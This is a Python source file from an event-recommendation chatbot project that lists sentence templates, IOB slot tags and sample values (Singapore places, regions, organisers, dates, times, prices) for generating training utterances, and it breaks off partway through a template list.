] | null | null | null | code/natural_language_understanding/inform_sentences_preparation.py | tanayz/SGbot | 983c756e1f0a2d5cb6d884fdfa34dc9c51eb74a0 | [
"MIT"
] | 2 | 2018-07-24T18:20:18.000Z | 2021-12-28T06:07:08.000Z | import dialog_config
import numpy as np
inform_venue_name_template = [
"Tell me about events near {}.",
"Are there any events near {}?",
"Does {} have any events?",
"What events are at {}?",
"I would like to find an event near {}.",
"Are there any events at {}?",
"Could you please tell me some events at {}?",
"Any events near {}?",
"Do you know any events near {}?",
"Can you recommend some events near {}?"]
inform_venue_name_tag = ["B-venue_name", "I-venue_name"]
sample_venue_name = ["Alexandra", "Aljunied", "Geylang", "Ayer Rajah", "Balestier", "Bartley", "Bishan",
"Marymount", "Sin Ming", "Bukit Timah", "Sixth Avenue", "Buona Vista", "Holland Village",
"one-north", "Ghim Moh", "Chinatown", "Clarke Quay", "Kreta Ayer", "Telok Ayer", "Kallang",
"Bendemeer", "Geylang Bahru", "Kallang Bahru", "Kallang Basin", "Kolam Ayer", "Tanjong Rhu",
"Mountbatten", "Old Airport", "Lavender", "Boon Keng", "Kent Ridge", "Kim Seng",
"Little India", "Farrer Park", "Jalan Besar", "MacPherson", "Marina Bay", "Esplanade",
"Marina Bay Sands", "Marina Centre", "Marina East", "Marina South", "Mount Faber",
"Mount Vernon", "Museum", "Newton", "Novena", "Orchard Road", "Dhoby Ghaut", "Emerald Hill",
"Peranakan Place", "Tanglin", "Outram", "Pasir Panjang", "Paya Lebar", "Eunos", "Geylang East",
"Potong Pasir", "Rochor-Kampong Glam", "Bencoolen", "Bras Basah", "Bugis", "Queenstown",
"Dover", "Commonwealth", "Raffles Place", "River Valley", "Singapore River",
"Southern Islands", "Tanjong Pagar", "Shenton Way", "Telok Blangah", "Bukit Chandu",
"Bukit Purmei", "HarbourFront", "Keppel", "Radin Mas", "Mount Faber", "Tiong Bahru",
"Bukit Ho Swee", "Bukit Merah", "Toa Payoh", "Bukit Brown", "Caldecott Hill", "Thomson",
"Whampoa", "St. Michael's", "East", "Bedok", "Bedok Reservoir", "Chai Chee", "Kaki Bukit",
"Tanah Merah", "Changi", "Changi Bay", "Changi East", "Changi Village", "East Coast",
"Joo Chiat", "Katong", "Kembangan", "Pasir Ris", "Elias", "Lorong Halus", "Loyang",
"Marine Parade", "Siglap", "Tampines", "Simei", "Ubi", "North", "Central Catchment Nature Reserve",
"Kranji", "Lentor", "Lim Chu Kang", "Neo Tiew", "Sungei Gedong", "Mandai", "Sembawang",
"Canberra", "Senoko", "Simpang", "Sungei Kadut", "Woodlands", "Admiralty", "Innova",
"Marsiling", "Woodgrove", "Yishun", "Chong Pang", "North-East", "Ang Mo Kio", "Cheng San",
"Chong Boon", "Kebun Baru", "Teck Ghee", "Yio Chu Kang", "Bidadari", "Hougang", "Defu",
"Kovan", "Lorong Chuan", "North-Eastern Islands", "Punggol", "Punggol Point",
"Punggol New Town", "Seletar", "Sengkang", "Serangoon", "Serangoon Gardens", "Serangoon North",
"Boon Lay", "Tukang", "Liu Fang", "Samulun", "Shipyard", "Bukit Batok", "Bukit Gombak",
"Hillview", "Guilin", "Bukit Panjang", "Choa Chu Kang", "Yew Tee",
"Clementi", "Toh Tuck", "West Coast", "Jurong East", "Toh Guan", "International Business Park",
"Teban Gardens", "Pandan Gardens", "Penjuru", "Yuhua", "Jurong Regional Centre",
"Jurong West", "Hong Kah", "Taman Jurong", "Boon Lay Place", "Chin Bee",
"Yunnan", "Central", "Kian Teck", "Safti", "Wenya", "Lim Chu Kang", "Pioneer", "Joo Koon",
"Gul Circle", "Pioneer Sector", "Tengah", "Tuas", "Wrexham", "Promenade", "Pioneer",
"Soon Lee", "Tuas South", "Western Islands Planning Area", "Western Water Catchment",
"Murai", "Sarimbun"]
inform_region_template = [
"Tell me about events in the {}.",
"Tell me about events in the {} area.",
"Tell me about events in the {} region.",
"Are there any events in the {} area?",
"Are there any events in the {} region?",
"What events are in the {}?",
"What events are in the {} region?",
"What events are in the {} area?",
"I would like to find an event in the {}.",
"I would like to find an event in the {} region.",
"I would like to find an event in the {} area.",
"Are there any events in the {}?",
"Are there any events in the {} region?",
"Are there any events in the {} area?",
"Could you please tell me some events in the {}?",
"Could you please tell me some events in the {} area?",
"Could you please tell me some events in the {} region?",
"Any events in the {}?",
"Any events in the {} area?",
"Any events in the {} region?",
"Do you know any events in the {}?",
"Do you know any events in the {} region?",
"Can you recommend some events in the {}?",
"Can you recommend some events in the {} area?",
"Tell me about events in the {} area of Singapore.",
"Are there any events in the {} region of Singapore?",
"What events are in the {} area of Singapore?",
"I would like to find an event in the {} region of Singapore.",
"Are there any events in the {} region of Singapore?",
"Could you please tell me some events in the {} area of Singapore?",
"Any events in the {} region of Singapore?",
"Do you know any events in the {} region of Singapore?",
"Can you recommend some events in the {} area of Singapore?"]
inform_region_tag = ["B-region"]
sample_region = ["City", "South", "West", "Central", "East", "North"]
inform_event_host_template = [
"Are there events by {}?",
"What events would be organised by {}?",
"Is {} organising any events?",
"What events are {} organising?",
"Which event is {} an organiser of?",
"Are there any events by the group {}?",
"Is the group {} organising any events?",
"Any events with {}?",
"Could you please recommend me some events organising by {}?",
"Can you tell me events by {}?"
]
inform_event_host_tag = ["B-event_host", "I-event_host"]
sample_event_host = [
"Sg Intl Investors & Social Networking Club. 3,000+ Members", "Badminton Fanatics",
"Singapore Beauty Workshop by Jo Makeup", "Sg International Globetrotters Club- SIGC 8,000+ Members",
"Speed & Blind Dating Club", "Expats Social Networking Club- ESNC", "Expats Social Networking Club",
"Meetup Newbies Gathering & Mingling Club", "SINGAPORE SINGLES & DATING CLUB",
"I'M SINGLE, YOU'RE SINGLE. LET'S MINGLE & LATER SNUGGLE", "Afterwork Drinks For Friendship & Social Networking Club",
"Expats & Social Nomads", "Social Networking & Hanging Out With New Friends Club", "Freelancers Singapore Meetup",
"Singapore Fun Events (SFE)", "Zumba! Singapore (1Fiesta)", "E-Commerce as Easy as 123", "Art Of Movement Meetup",
"Singapore Fun Events (SFE)", "StrangerSoccer - Daily soccer games for you all over Spore!", "Jo Makeup",
"EXPAT FRIENDS SINGAPORE", "All My Friends Are in Couples & I'm Single", "Singapore Women's Empowerment",
"The Golden Space", "LiveLife with Fun Events & Activities", "Badminton Workout",
"Dance Haven Bellydance & Bellydance Fitness", "Singapore Oyster Crawl",
"Singapore International Opportunities Networking (SION)", "SBN: Business Networking over Quality Tea (BNQT)",
"StrangerSoccer", "SBN: B2B2C Global Luncheon Networking", "Singapore International Opportunities Networking (SION)",
"Innovation Marketing & Sales Group", "Comedy Hub Singapore", "Singapore Squash Players", "Wind Slicer Badminton",
"JOYCORONA", "Singapore Trekking Group (SgTrek)", "Starz PB", "Culinary Underground Singapore", "Cooking In Singapore",
"Jiggle Wigs Music", "Isha Kriya", "Lula", "Charissa", "Dwight", "Christoper", "Juana", "Gennie", "Eustolia", "Kip",
"Diana", "Ophelia", "Hipolito", "Javier", "Angle", "Hui", "Josefine", "Oliva", "Alex", "Reagan", "Mitsue", "Kyoko",
"Carlton", "Felipa", "Jazmin", "Gilma", "Minnie", "Duncan", "Shaun", "Margurite", "Necole", "Dewayne", "Charlotte",
"Adrien", "Carissa", "Waldo", "Jillian", "Clemente", "Walker", "Broderick", "Sabrina", "Novella", "Mckenzie",
"Etsuko", "Jadwiga", "Jerold", "Estelle", "Jetta", "Sierra", "Jacquelyn", "Edgar", "See", "OCBC Bank", "DBS Group",
"Singtel", "UOB", "Wilmar International", "Trafigura Group", "Flextronics", "2C2P", "Aetos Security Management",
"AIBI International", "Antlabs", "Aspial Corporation", "Ayam Brand", "Bee Cheng Hiang", "Boustead Singapore",
"BreadTalk", "Broadcom Limited", "CapitaLand", "Carousell", "Certis CISCO", "Charles & Keith", "China Aviation Oil",
"ComfortDelGro", "Creative Technology", "DBS Bank", "dnata Singapore", "Far East Orchard", "Far East Organization",
"FilmTack", "Flextronics", "Fraser and Neave", "Garena", "Genting Singapore", "Golden Agri-Resources", "Grab",
"Great Eastern Life", "Hyflux", "Jetstar Asia Airways", "Jurong Port", "JTC Corporation", "Keppel Corporation",
"M1 Limited", "Mediacorp", "MyRepublic", "Near", "Neptune Orient Lines", "NTUC FairPrice", "OCBC Bank",
"Osim International", "PSA International", "Pacific Century Regional Developments Limited", "Popular Holdings",
"POSB Bank", "Quest Global", "Renewable Energy Corporation", "SATS Ltd", "SBS Transit", "Scoot", "SearchTrade",
"SembCorp Marine", "SIA Engineering Company", "Singapore Press Holdings", "SMRT Corporation", "SGAG", "Sheng Siong",
"SilkAir", "Singapore Airlines", "Singapore Airlines Cargo", "Singapore Exchange", "Singapore Petroleum Company Limited",
"Singapore Power", "Singapore Post", "Singtel", "ST Engineering", "StarHub", "Systems on Silicon Manufacturing",
"Tangs", "Tee Yih Jia", "Temasek Holdings", "Thakral Corporation", "Tiger Airways Holdings", "Transocean Singapore",
"Twelve Cupcakes", "Venture Corporation", "Vertex Venture Holdings", "Ya Kun Kaya Toast", "Yeo Hiap Seng", "Wilmar"]
inform_date_start_template = [
"I want to know what events are occurring on {}.",
"Are there any events on {}?",
"What events are on {}?",
"Does {} have events I can attend?",
"Will there be any events on {}?",
"Can you recommend me some events on {}?",
"Do you kow any events holding on {}?",
"Do you have any suggestions on events on {}?"
]
inform_date_start_tag = ["B-date_start", "I-date_start"]
sample_date_start_weekday = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday",
"Sun", "Mon", "Tue", "Tues", "Wed", "Weds", "Thu", "Thurs", "Fri", "Sat"]
sample_date_start_month =[ "January", "February", "March", "April", "May", "June", "July", "August", "September", "October",
"November", "December", "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Sept", "Oct", "Nov", "Dec"]
np.random.shuffle(sample_date_start_month)
np.random.shuffle(sample_date_start_weekday)
sample_date_start = sample_date_start_weekday + ['next ' + date for date in sample_date_start_weekday[:5]]
sample_date_start += sample_date_start_month + ['next ' + date for date in sample_date_start_month[:5]]
for i in range(2015, 2020):
np.random.shuffle(sample_date_start_month)
sample_date_start += [date + ' ' + str(i) for date in sample_date_start_month[:5]]
for i in range(1, 32):
np.random.shuffle(sample_date_start_month)
sample_date_start += [date + ' ' + str(i) for date in sample_date_start_month[:5]]
sample_date_start += [str(i) + ' ' + date for date in sample_date_start_month[:5]]
inform_time_template = [
"I would like to know about events that are around {}.",
"Are there any events that start at {}?",
"Tell me about events around {}.",
"Will there be any events around {}?",
"I want to know if there are events at {}?",
"Do you know any events start at {}?",
"Can you recommend any event begins around {}?",
"Can I know some events at around {}?",
"I would like to know about events holding around {}.",
"I would like to know about events occurring around {}.",
"Tell me about events holding around {}.",
"Tell me about events occurring around {}.",
"Will there be any events holding around {}?",
"Will there be any events occurring around {}?",
"I want to know if there are events holding at {}?",
"I want to know if there are events occurring at {}?",
"Can you recommend any event begins around {}?",
"Can I know some events that begin at around {}?",
"Can I know some events beginning at around {}?"
]
inform_time_tag = ["B-time", "I-time"]
sample_time = [str(time) for time in range(15,18)]
sample_time = [str(time) + " a.m." for time in range(3,6)]
sample_time = [str(time) + " p.m." for time in range(9,12)]
sample_time = [str(time) + " o'clock" for time in range(12,15)]
sample_time += [str(time) + ':00' for time in range(0,3)]
sample_time += [str(time) + ':00' + " am" for time in range(3, 6)]
sample_time += [str(time) + ':00' + " pm" for time in range(9, 13)]
sample_time += [str(time) + ':15' for time in range(3,6)]
sample_time += [str(time) + ':15' + " pm" for time in range(0, 3)]
sample_time += [str(time) + ':15' + " p.m." for time in range(3, 6)]
sample_time += [str(time) + ':15' + " o'clock" for time in range(18,21)]
sample_time += [str(time) + ':30' for time in range(6,9)]
sample_time += [str(time) + ':30' + " am" for time in range(9, 13)]
sample_time += [str(time) + ':30' + " a.m." for time in range(0,3)]
sample_time += [str(time) + ':30' + " o'clock" for time in range(21,24)]
sample_time += [str(time) + ':45' for time in range(9, 13)]
sample_time += [str(time) + ':45' + " a.m." for time in range(3, 6)]
sample_time += [str(time) + ':45' + " pm" for time in range(6, 9)]
inform_price_template = [
"Do you know any free events?",
"Tell me about some free events.",
"Can you recommend me some free events?",
"Do you have any suggestions for free events?",
"Are there any events around {} dollars.",
"Are there any events around {} SGD.",
"Are there any events less than {} dollars.",
"Are there any events less than {} SGD.",
"Are there any events around ${}.",
"I would like to find an event that costs {} dollars.",
"I would like to find an event that costs {} SGD.",
"I would like to find an event that costs ${}.",
"Let me know if there are events that are around {} dollars.",
"Let me know if there are events that are around {} SGD.",
"Let me know if there are events that are less than {} dollars.",
"Let me know if there are events that are less than {} SGD.",
"Let me know if there are events that are around ${}.",
"Let me know if there are events that are around {} SGD.",
"Will there be events that cost less than {} dollars?",
"Will there be events that cost less than {} SGD?",
"Will there be events that cost around {} dollars?",
"Will there be events that cost around {} SGD?",
"Will there be events that cost ${}?",
"Will there be events that cost {} SGD?"
]
inform_price_tag = ["B-price"]
sample_price = ["1", "2", "3", "4", "5", "10", "15", "20", "25", "30", "35", "40", "45", "50", "60", "70", "80", "90",
"100", "150", "200"]
inform_is_weekend_template = [
"Tell me about events that on {}.",
"Which events take place on {}.",
"I would like to find an event that is on {}.",
"What events are conducted on {}.",
"Will there be events that take place on {}?",
"I want to know the events that are available on {}.",
"Can you recommend some events on {}?",
"Do you have any suggestions on events on {}?",
"I want to find some events on {}."
]
inform_is_weekend_tag = ["B-part_of_day", "I-part_of_day"]
sample_is_weekend=["weekend", "weekdays"]
inform_part_of_day_template = [
"Tell me about events that are in {}.",
"Which events take place on {}.",
"I would like to find an event that is in {}.",
"What events are conducted on {}.",
"Will there be events that take place in {}?",
"I want to know the events that are available at {}.",
"Can you recommend some events start at {}?",
"Do you know any events begins in {}?",
"Do you have any suggestions on events in {}?",
"I want to find some events in {}."
]
inform_part_of_day_tag = ["B-part_of_day", "I-part_of_day"]
sample_part_of_day=["morning", "afternoon", "night", "evening", "noon", "dawn", "dusk", "twilight", "sunrise", "sun rise",
"sunset", "sun set", "daybreak", "day break", "night send", "daytime", "nighttime", "daylight",
"day light", "mid night", "midnight", "mid day", "midday", "after dark"]
inform_venue_name_and_region_template = [
"Tell me about events near {venue_name} in the {region}.",
"Tell me about events near {venue_name} in the {region} area.",
"Tell me about events near {venue_name} in the {region} region.",
"Tell me about events near {venue_name} in the {region} region of Singapore.",
"Tell me about events near {venue_name} in the {region} area of Singapore.",
"Are there any events near {venue_name} in the {region}?",
"Are there any events near {venue_name} in the {region} area?",
"Are there any events near {venue_name} in the {region} region?",
"Are there any events near {venue_name} in the {region} region of Singapore?",
"Are there any events near {venue_name} in the {region} area of Singapore?",
"Does {venue_name} in the {region} have any events?",
"Does {venue_name} in the {region} area have any events?",
"Does {venue_name} in the {region} region have any events?",
"Does {venue_name} in the {region} area of Singapore have any events?",
"Does {venue_name} in the {region} region of Singapore have any events?",
"What events are at {venue_name} in the {region}?",
"What events are at {venue_name} in the {region} area?",
"What events are at {venue_name} in the {region} region?",
"What events are at {venue_name} in the {region} area of Singapore?",
"What events are at {venue_name} in the {region} region of Singapore?",
"I would like to find an event near {venue_name} in the {region}.",
"I would like to find an event near {venue_name} in the {region} area.",
"I would like to find an event near {venue_name} in the {region} region.",
"I would like to find an event near {venue_name} in the {region} of Singapore.",
"I would like to find an event near {venue_name} in the {region} region of Singapore.",
"I would like to find an event near {venue_name} in the {region} area of Singapore.",
"Are there any events at {venue_name} in the {region}?",
"Are there any events at {venue_name} in the {region} area?",
"Are there any events at {venue_name} in the {region} region?",
"Are there any events at {venue_name} in the {region} of Singapore?",
"Are there any events at {venue_name} in the {region} area of Singapore?",
"Are there any events at {venue_name} in the {region} region of Singapore?",
"Could you please tell me some events at {venue_name} in the {region}?",
"Could you please tell me some events at {venue_name} in the {region} area?",
"Could you please tell me some events at {venue_name} in the {region} region?",
"Could you please tell me some events at {venue_name} in the {region}?",
"Could you please tell me some events at {venue_name} in the {region} area of Singapore?",
"Could you please tell me some events at {venue_name} in the {region} region of Singapore?",
"Any events near {venue_name} in the {region}?",
"Any events near {venue_name} in the {region} region?",
"Any events near {venue_name} in the {region} area?",
"Any events near {venue_name} in the {region} of Singapore?",
"Any events near {venue_name} in the {region} region of Singapore?",
"Any events near {venue_name} in the {region} area of Singapore?",
"Do you know any events near {venue_name} in the {region}?",
"Do you know any events near {venue_name} in the {region} region?",
"Do you know any events near {venue_name} in the {region} area?",
"Do you know any events near {venue_name} in the {region}?",
"Do you know any events near {venue_name} in the {region} region of Singapore?",
"Do you know any events near {venue_name} in the {region} area of Singapore?",
"Can you recommend some events near {venue_name} in the {region}?",
"Can you recommend some events near {venue_name} in the {region} area?",
"Can you recommend some events near {venue_name} in the {region} region?",
"Can you recommend some events near {venue_name} in the {region} of Singaproe?",
"Can you recommend some events near {venue_name} in the {region} region of Singapore?",
"Can you recommend some events near {venue_name} in the {region} area of Singapore?"
]
inform_venue_name_and_event_host_template = [
"Are there events by {event_host} near {venue_name}?",
"Are there events by {event_host} at {venue_name}?",
"Are there events near {venue_name} by {event_host} ?",
"Are there events at {venue_name} by {event_host} ?",
"What events would be organised by {event_host} near {venue_name}?",
"What events would be organised by {event_host} at {venue_name}?",
"What events near {venue_name} would be organised by {event_host}?",
"What events at {venue_name} would be organised by {event_host}?",
"Is {event_host} organising any events near {venue_name}?",
"Is {event_host} organising any events at {venue_name}?",
"What events are {event_host} organising near {venue_name}?",
"What events are {event_host} organising at {venue_name}?",
"What events near {venue_name} are {event_host} organising?",
"What events at {venue_name} are {event_host} organising?",
"Which event near {venue_name} is {event_host} an organiser of?",
"Which event at {venue_name} is {event_host} an organiser of?",
"Are there any events by the group {event_host} near {venue_name}?",
"Are there any events by the group {event_host} at {venue_name}?",
"Are there any events near {venue_name} by the group {event_host}?",
"Are there any events at {venue_name} by the group {event_host}?",
"Is the group {event_host} organising any events near {venue_name}?",
"Is the group {event_host} organising any events at {venue_name}?",
"Any events with {event_host} near {venue_name}?",
"Any events with {event_host} at {venue_name}?",
"Could you please recommend me some events organising by {event_host} near {venue_name}?",
"Could you please recommend me some events organising by {event_host} at {venue_name}?",
"Could you please recommend me some events near {venue_name} organising by {event_host}?",
"Could you please recommend me some events at {venue_name} organising by {event_host}?",
"Can you tell me events by {event_host} near {venue_name}?",
"Can you tell me events by {event_host} at {venue_name}?",
"Can you tell me events at {venue_name} by {event_host}?",
"Can you tell me events near {venue_name} by {event_host}?"
]
inform_venue_name_and_date_start_template = [
"I want to know what events are occurring on {date_start} at {venue_name}.",
"I want to know what events are occurring on {date_start} near {venue_name}.",
"I want to know what events are occurring at {venue_name} on {date_start}.",
"I want to know what events are occurring near {venue_name} on {date_start}.",
"Are there any events on {date_start} at {venue_name}?",
"Are there any events on {date_start} near {venue_name}?",
"Are there any events at {venue_name} on {date_start}?",
"Are there any events near {venue_name} on {date_start}?",
"What events on {date_start} are at {venue_name}?",
"What events on {date_start} are near {venue_name}?",
"What events at {venue_name} are on {date_start}?",
"What events near {venue_name} are on {date_start}?",
"Does {date_start} have events I at {venue_name}?",
"Does {date_start} have events I near {venue_name}?",
"Will there be any events on {date_start} at {venue_name}?",
"Will there be any events on {date_start} near {venue_name}?",
"Will there be any events at {venue_name} on {date_start}?",
"Will there be any events near {venue_name} on {date_start}?",
"Can you recommend me some events on {date_start} at {venue_name}?",
"Can you recommend me some events on {date_start} near {venue_name}?",
"Can you recommend me some events at {venue_name} on {date_start}?",
"Can you recommend me some events near {venue_name} on {date_start}?",
"Do you kow any events holding on {date_start} at {venue_name}?",
"Do you kow any events holding on {date_start} near {venue_name}?",
"Do you kow any events holding at {venue_name} on {date_start}?",
"Do you kow any events holding near {venue_name} on {date_start}?",
"Do you have any suggestions on events on {date_start} at {venue_name}?",
"Do you have any suggestions on events on {date_start} near {venue_name}?",
"Do you have any suggestions on events at {venue_name} on {date_start}?",
"Do you have any suggestions on events near {venue_name} on {date_start}?"
]
inform_venue_name_and_time_template = [
"I would like to know about events that are around {time} near {venue_name}.",
"I would like to know about events that are around {time} at {venue_name}.",
"I would like to know about events that are near {venue_name} around {time}.",
"I would like to know about events that are at {venue_name} around {time}.",
"Are there any events that start at {time} near {venue_name}?",
"Are there any events near {venue_name} that start at {time}?",
"Tell me about events around {time} near {venue_name}.",
"Tell me about events around {time} at {venue_name}.",
"Tell me about events near {venue_name} around {time}.",
"Tell me about events at {venue_name} around {time}.",
"Will there be any events around {time} near {venue_name}?",
"Will there be any events around {time} at {venue_name}?",
"Will there be any events near {venue_name} around {time}?",
"Will there be any events at {venue_name} around {time}?",
"I want to know if there are events at {time} near {venue_name}?",
"I want to know if there are events around {time} near {venue_name}?",
"I want to know if there are events around {time} at {venue_name}?",
"I want to know if there are events at {venue_name} around {time}?",
"Do you know any events start at {time} near {venue_name}?",
"Do you know any events start around {time} near {venue_name}?",
"Do you know any events start at around {time} near {venue_name}?",
"Do you know any events at {venue_name} start at around {time}?",
"Can you recommend any event begins around {time} near {venue_name}?",
"Can you recommend any event begins around {time} at {venue_name}?",
"Can you recommend any event begins near {venue_name} around {time}?",
"Can you recommend any event begins at {venue_name} around {time}?",
"Can I know some events at around {time} near {venue_name}?",
"Can I know some events at around {time} at {venue_name}?",
"Can I know some events near {venue_name} at around {time}?",
"Can I know some events at {venue_name} around {time}?",
]
inform_venue_name_and_price_template = [
"Do you know any free events at {venue_name}?",
"Do you know any free events near {venue_name}?",
"Tell me about some free events at {venue_name}.",
"Tell me about some free events near {venue_name}.",
"Can you recommend me some free events at {venue_name}?",
"Can you recommend me some free events near {venue_name}?",
"Do you have any suggestions for free events at {venue_name}?",
"Do you have any suggestions for free events near {venue_name}?",
"Are there any events around {price} dollars at {venue_name}.",
"Are there any events around {price} SGD at {venue_name}.",
"Are there any events around {price} dollars near {venue_name}.",
"Are there any events at {venue_name} around {price} dollars.",
"Are there any events at {venue_name} around {price} SGD.",
"Are there any events near {venue_name}, around {price} dollars.",
"Are there any events less than {price} dollars near {venue_name}.",
"Are there any events less than {price} SGD near {venue_name}.",
"Are there any events less than {price} dollars at {venue_name}.",
"Are there any events near {venue_name} less than {price} dollars.",
"Are there any events at {venue_name} less than {price} dollars.",
"Are there any events at {venue_name} less than {price} SGD.",
"Are there any events around ${price} at {venue_name}.",
"Are there any events around ${price} near {venue_name}.",
"Are there any events around {price} SGD near {venue_name}.",
"Are there any events at {venue_name} around ${price}.",
"Are there any events near {venue_name} around ${price}.",
"Are there any events near {venue_name} around {price} SGD.",
"I would like to find an event at {venue_name} that costs {price} dollars.",
"I would like to find an event near {venue_name} that costs {price} dollars.",
"I would like to find an event that costs {price} dollars at {venue_name}.",
"I would like to find an event that costs {price} dollars near {venue_name}.",
"I would like to find an event that costs {price} SGD near {venue_name}.",
"I would like to find an event that costs ${price} at {venue_name}.",
"I would like to find an event that costs ${price} near {venue_name}.",
"I would like to find an event at {venue_name} that costs ${price}.",
"Let me know if there are events at {venue_name} that are around {price} dollars.",
"Let me know if there are events at {venue_name} that are around {price} SGD.",
"Let me know if there are events near {venue_name} that are around {price} dollars.",
"Let me know if there are events that are around {price} dollars and are at {venue_name}.",
"Let me know if there are events that are around {price} dollars and are near {venue_name}.",
"Let me know if there are events at {venue_name} that are less than {price} dollars.",
"Let me know if there are events near {venue_name} that are less than {price} dollars.",
"Let me know if there are events that are less than {price} dollars at {venue_name}.",
"Let me know if there are events that are less than {price} dollars near {venue_name}.",
"Let me know if there are events that are around ${price} at {venue_name}.",
"Let me know if there are events that are around {price} SGD at {venue_name}.",
"Let me know if there are events that are around ${price} near {venue_name}.",
"Let me know if there are events that at {venue_name} are around ${price}.",
"Let me know if there are events that at {venue_name} are around {price} SGD.",
"Let me know if there are events near {venue_name} that are around ${price}.",
"Will there be events that cost less than {price} dollars near {venue_name}?",
"Will there be events that cost less than {price} dollars at {venue_name}?",
"Will there be events near {venue_name} that cost less than {price} dollars?",
"Will there be events near {venue_name} that cost less than {price} SGD?",
"Will there be events at {venue_name} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars at {venue_name}?",
"Will there be events that cost around {price} dollars near {venue_name}?",
"Will there be events that cost around {price} SGD near {venue_name}?",
"Will there be events at {venue_name} that cost around {price} dollars?",
"Will there be events at {venue_name} that cost around {price} SGD?",
"Will there be events near {venue_name} that cost around {price} dollars?",
"Will there be events that cost ${price} at {venue_name}?",
"Will there be events that cost {price} SGD at {venue_name}?",
"Will there be events that cost ${price} near {venue_name}?",
"Will there be events at {venue_name} that cost ${price}?",
"Will there be events near {venue_name} that cost ${price}?",
"Will there be events near {venue_name} that cost {price} SGD?"
]
inform_venue_name_and_is_weekend_template = [
"Tell me about events at {venue_name} that are on {is_weekend}.",
"Tell me about events near {venue_name} that are on {is_weekend}.",
"Tell me about events that are on {is_weekend} and at {venue_name}.",
"Tell me about events that are on {is_weekend} and near {venue_name}.",
"Which events take place on {is_weekend} near {venue_name}.",
"Which events take place on {is_weekend} at {venue_name}.",
"Which events at {venue_name} will take place on {is_weekend}.",
"Which events near {venue_name} will take place on {is_weekend}.",
"I would like to find an event that is on {is_weekend} at {venue_name}.",
"I would like to find an event that is on {is_weekend} near {venue_name}.",
"I would like to find an event at {venue_name} that is on {is_weekend}.",
"I would like to find an event near {venue_name} that is on {is_weekend}.",
"What events are conducted on {is_weekend} near {venue_name}.",
"What events are conducted on {is_weekend} at {venue_name}.",
"What events near {venue_name} are conducted on {is_weekend}.",
"What events at {venue_name} are conducted on {is_weekend}.",
"Will there be events that take place on {is_weekend} near {venue_name}?",
"Will there be events that take place on {is_weekend} at {venue_name}?",
"Will there be events near {venue_name} that take place on {is_weekend}?",
"Will there be events at {venue_name} that take place on {is_weekend}?",
"I want to know the events near {venue_name} that are available on {is_weekend}.",
"I want to know the events at {venue_name} that are available on {is_weekend}.",
"I want to know the events that are available on {is_weekend} and near {venue_name}.",
"I want to know the events that are available on {is_weekend} and are at {venue_name}.",
"Can you recommend some events on {is_weekend} near {venue_name}?",
"Can you recommend some events on {is_weekend} at {venue_name}?",
"Can you recommend some events near {venue_name} on {is_weekend}?",
"Can you recommend some events at {venue_name} on {is_weekend}?",
"Do you have any suggestions on events near {venue_name} on {is_weekend}?",
"Do you have any suggestions on events at {venue_name} on {is_weekend}?",
"I want to find some events on {is_weekend} near {venue_name}.",
"I want to find some events on {is_weekend} at {venue_name}.",
"I want to find some events near {venue_name} on {is_weekend}.",
"I want to find some events at {venue_name} on {is_weekend}."
]
inform_venue_name_and_part_of_day_template = [
"Tell me about events near {venue_name} that are in {part_of_day}.",
"Tell me about events at {venue_name} that are in {part_of_day}.",
"Tell me about events that are in {part_of_day} near {venue_name}.",
"Tell me about events that are in {part_of_day} at {venue_name}.",
"Which events take place on {part_of_day} at {venue_name}.",
"Which events take place on {part_of_day} near {venue_name}.",
"Which events take place at {venue_name} on {part_of_day}.",
"Which events take place near {venue_name} on {part_of_day}.",
"Which events at {venue_name} take place on {part_of_day}.",
"Which events near {venue_name} take place on {part_of_day}.",
"I would like to find an event that is in {part_of_day} near {venue_name}.",
"I would like to find an event that is in {part_of_day} at {venue_name}.",
"I would like to find an event near {venue_name} that is in {part_of_day}.",
"I would like to find an event at {venue_name} that is in {part_of_day}.",
"What events are conducted on {part_of_day} near {venue_name}.",
"What events are conducted on {part_of_day} at {venue_name}.",
"What events near {venue_name} are conducted on {part_of_day}.",
"What events at {venue_name} are conducted on {part_of_day}.",
"Will there be events that take place in {part_of_day} near {venue_name}?",
"Will there be events that take place in {part_of_day} at {venue_name}?",
"Will there be events near {venue_name} that take place in {part_of_day}?",
"Will there be events at {venue_name} that take place in {part_of_day}?",
"I want to know the events near {venue_name} that are available in {part_of_day}.",
"I want to know the events at {venue_name} that are available in {part_of_day}.",
"I want to know the events that are available in {part_of_day} near {venue_name}.",
"I want to know the events that are available in {part_of_day} at {venue_name}.",
"Can you recommend some events start at {part_of_day} near {venue_name}?",
"Can you recommend some events start at {part_of_day} at {venue_name}?",
"Can you recommend some events near {venue_name} start at {part_of_day}?",
"Can you recommend some events at {venue_name} start at {part_of_day}?",
"Do you know any events begins in {part_of_day} near {venue_name}?",
"Do you know any events begins in {part_of_day} at {venue_name}?",
"Do you know any events near {venue_name} begins in {part_of_day}?",
"Do you know any events at {venue_name} begins in {part_of_day}?",
"Do you have any suggestions on events in {part_of_day} near {venue_name}?",
"Do you have any suggestions on events in {part_of_day} at {venue_name}?",
"Do you have any suggestions on events near {venue_name} in {part_of_day}?",
"Do you have any suggestions on events at {venue_name} in {part_of_day}?",
"I want to find some events in {part_of_day} near {venue_name}.",
"I want to find some events in {part_of_day} at {venue_name}.",
"I want to find some events near {venue_name} in {part_of_day}.",
"I want to find some events at {venue_name} in {part_of_day}."
]
inform_region_and_event_host_template = [
"Are there events by {event_host} in the {region} region?",
"Are there events by {event_host} in the {region} area?",
"Are there events by {event_host} in the {region} region of Singapore?",
"Are there events by {event_host} in the {region}?",
"Are there events in the {region} region by {event_host}?",
"Are there events in the {region} area by {event_host}?",
"Are there events in the {region} region of Singapore by {event_host}?",
"Are there events in the {region} by {event_host}?",
"What events would be organised by {event_host} in the {region}?",
"What events would be organised by {event_host} in the {region} region?",
"What events would be organised by {event_host} in the {region} area?",
"What events would be organised by {event_host} in the {region} of Singapore?",
"What events in the {region} would be organised by {event_host}?",
"What events in the {region} region would be organised by {event_host}?",
"What events in the {region} area would be organised by {event_host}?",
"What events in the {region} of Singapore would be organised by {event_host}?",
"Is {event_host} organising any events in the {region}?",
"Is {event_host} organising any events in the {region} region?",
"Is {event_host} organising any events in the {region} area?",
"Is {event_host} organising any events in the {region} of Singapore?",
"Is {event_host} organising any events in the {region} area of Singapore?",
"What events are {event_host} organising in the {region}?",
"What events are {event_host} organising in the {region} area?",
"What events are {event_host} organising in the {region} region?",
